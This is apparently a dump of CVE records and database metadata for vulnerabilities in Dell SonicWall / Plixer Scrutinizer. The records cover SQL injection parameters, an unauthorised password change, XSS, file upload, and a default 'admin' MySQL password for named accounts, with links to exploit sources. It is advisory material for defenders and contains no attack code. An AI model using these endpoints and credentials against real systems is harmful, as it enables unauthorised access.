"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/127429/dell-sonicwall-scrutinizer-11.01-code-execution-sql-injection.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/68495"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2014/jul/44"
},
{
"trust": 1.7,
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"trust": 1.7,
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94438"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4976"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4976"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/94438"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72917"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-364"
},
{
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-72917"
},
{
"db": "BID",
"id": "68495"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-364"
},
{
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-07-16T00:00:00",
"db": "VULHUB",
"id": "VHN-72917"
},
{
"date": "2014-07-10T00:00:00",
"db": "BID",
"id": "68495"
},
{
"date": "2014-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"date": "2014-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-364"
},
{
"date": "2014-07-16T14:19:04.323000",
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-72917"
},
{
"date": "2014-07-24T00:09:00",
"db": "BID",
"id": "68495"
},
{
"date": "2014-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"date": "2014-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-364"
},
{
"date": "2024-11-21T02:11:12.390000",
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-364"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dell SonicWall Scrutinizer Vulnerable to changing user password",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-364"
}
],
"trust": 0.6
}
}
CVE-2014-4977 (GCVE-0-2014-4977)
Vulnerability from cvelistv5
Published
2014-07-16 14:00
Modified
2024-08-06 11:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.exploit-db.com/exploits/39836/ | exploit, x_refsource_EXPLOIT-DB | |
| http://seclists.org/fulldisclosure/2014/Jul/44 | mailing-list, x_refsource_FULLDISC | |
| http://packetstormsecurity.com/files/137098/Dell-SonicWALL-Scrutinizer-11.01-methodDetail-SQL-Injection.html | x_refsource_MISC | |
| http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/94439 | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/bid/68495 | vdb-entry, x_refsource_BID | |
| https://gist.github.com/brandonprry/36b4b8df1cde279a9305 | x_refsource_MISC | |
| https://gist.github.com/brandonprry/76741d9a0d4f518fe297 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T11:34:36.637Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "39836",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/39836/"
},
{
"name": "20140710 Dell Scrutinizer 11.01 multiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/137098/Dell-SonicWALL-Scrutinizer-11.01-methodDetail-SQL-Injection.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"name": "dell-scrutinizer-admin-sql-injection(94439)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94439"
},
{
"name": "68495",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-07-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "39836",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/39836/"
},
{
"name": "20140710 Dell Scrutinizer 11.01 multiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/137098/Dell-SonicWALL-Scrutinizer-11.01-methodDetail-SQL-Injection.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"name": "dell-scrutinizer-admin-sql-injection(94439)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94439"
},
{
"name": "68495",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-4977",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "39836",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/39836/"
},
{
"name": "20140710 Dell Scrutinizer 11.01 multiple vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"name": "http://packetstormsecurity.com/files/137098/Dell-SonicWALL-Scrutinizer-11.01-methodDetail-SQL-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/137098/Dell-SonicWALL-Scrutinizer-11.01-methodDetail-SQL-Injection.html"
},
{
"name": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"name": "dell-scrutinizer-admin-sql-injection(94439)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94439"
},
{
"name": "68495",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/68495"
},
{
"name": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305",
"refsource": "MISC",
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"name": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297",
"refsource": "MISC",
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-4977",
"datePublished": "2014-07-16T14:00:00",
"dateReserved": "2014-07-16T00:00:00",
"dateUpdated": "2024-08-06T11:34:36.637Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-4976 (GCVE-0-2014-4976)
Vulnerability from cvelistv5
Published
2014-07-16 14:00
Modified
2024-08-06 11:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/fulldisclosure/2014/Jul/44 | mailing-list, x_refsource_FULLDISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/94438 | vdb-entry, x_refsource_XF | |
| http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html | x_refsource_MISC | |
| http://www.securityfocus.com/bid/68495 | vdb-entry, x_refsource_BID | |
| https://gist.github.com/brandonprry/36b4b8df1cde279a9305 | x_refsource_MISC | |
| https://gist.github.com/brandonprry/76741d9a0d4f518fe297 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T11:34:37.305Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20140710 Dell Scrutinizer 11.01 multiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"name": "dell-scrutinizer-admin-sec-bypass(94438)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94438"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"name": "68495",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-07-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20140710 Dell Scrutinizer 11.01 multiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"name": "dell-scrutinizer-admin-sec-bypass(94438)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94438"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"name": "68495",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-4976",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20140710 Dell Scrutinizer 11.01 multiple vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"name": "dell-scrutinizer-admin-sec-bypass(94438)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94438"
},
{
"name": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"name": "68495",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/68495"
},
{
"name": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305",
"refsource": "MISC",
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"name": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297",
"refsource": "MISC",
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-4976",
"datePublished": "2014-07-16T14:00:00",
"dateReserved": "2014-07-16T00:00:00",
"dateUpdated": "2024-08-06T11:34:37.305Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3848 (GCVE-0-2012-3848)
Vulnerability from cvelistv5
Published
2012-07-31 10:00
Modified
2024-09-16 22:03
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | x_refsource_MISC | |
| http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:21:03.660Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-07-31T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3848",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"name": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html",
"refsource": "MISC",
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3848",
"datePublished": "2012-07-31T10:00:00Z",
"dateReserved": "2012-07-06T00:00:00Z",
"dateUpdated": "2024-09-16T22:03:29.811Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-2627 (GCVE-0-2012-2627)
Vulnerability from cvelistv5
Published
2012-07-31 10:00
Modified
2024-09-16 17:29
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | x_refsource_MISC | |
| http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:42:30.655Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\\Scrutinizer\\snmp\\mibs\\ via a multipart/form-data POST request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-07-31T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2627",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\\Scrutinizer\\snmp\\mibs\\ via a multipart/form-data POST request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"name": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html",
"refsource": "MISC",
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2627",
"datePublished": "2012-07-31T10:00:00Z",
"dateReserved": "2012-05-11T00:00:00Z",
"dateUpdated": "2024-09-16T17:29:08.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3951 (GCVE-0-2012-3951)
Vulnerability from cvelistv5
Published
2012-07-31 10:00
Modified
2024-09-17 03:07
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | x_refsource_MISC | |
| http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:21:04.210Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-07-31T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3951",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"name": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html",
"refsource": "MISC",
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3951",
"datePublished": "2012-07-31T10:00:00Z",
"dateReserved": "2012-07-10T00:00:00Z",
"dateUpdated": "2024-09-17T03:07:09.522Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-2962 (GCVE-0-2012-2962)
Vulnerability from cvelistv5
Published
2012-07-30 22:00
Modified
2024-08-06 19:50
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.osvdb.org/84232 | vdb-entry, x_refsource_OSVDB | |
